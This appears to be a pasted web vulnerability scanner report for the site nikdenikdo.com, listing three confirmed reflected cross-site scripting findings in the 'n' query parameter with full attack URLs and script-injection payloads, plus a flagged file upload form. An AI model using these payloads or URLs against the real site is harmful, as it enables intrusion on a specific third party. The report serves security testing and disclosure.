nikdenikdo.com

1. XSS (Cross-site Scripting)
2.  
3. Severity: Important
4. Confirmation: Confirmed
5. URL: http://www.nikdenikdo.com/index.php?n='"--></style></script><script>alert(0x0002B4)</script>
6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
7. Parameter Name: n
8. Parameter Type: Querystring
9. Attack Pattern: '"--></style></script><script>alert(0x0002B4)</script>
10.  
11. Severity: Important
12. Confirmation: Confirmed
13. URL: http://www.nikdenikdo.com/index.php?n='"--></style></script><script>alert(0x0002B7)</script>&strana=1
14. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
15. Parameter Name: n
16. Parameter Type: Querystring
17. Attack Pattern: '"--></style></script><script>alert(0x0002B7)</script>
18.  
19. Severity: Important
20. Confirmation: Confirmed
21. URL: http://www.nikdenikdo.com/index.php?n='"--></style></script><script>alert(0x000350)</script>
22. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
23. Parameter Name: n
24. Parameter Type: Querystring
25. Attack Pattern: '"--></style></script><script>alert(0x000350)</script>
26.  
27. ||| File Upload Functionality Identified
28.  
29. Severity : Information
30. Confirmation : Confirmed
31. Vulnerable URL : http://www.nikdenikdo.com/index.php?n=4
32. Vulnerability Classifications: -
33. Form Name: soubor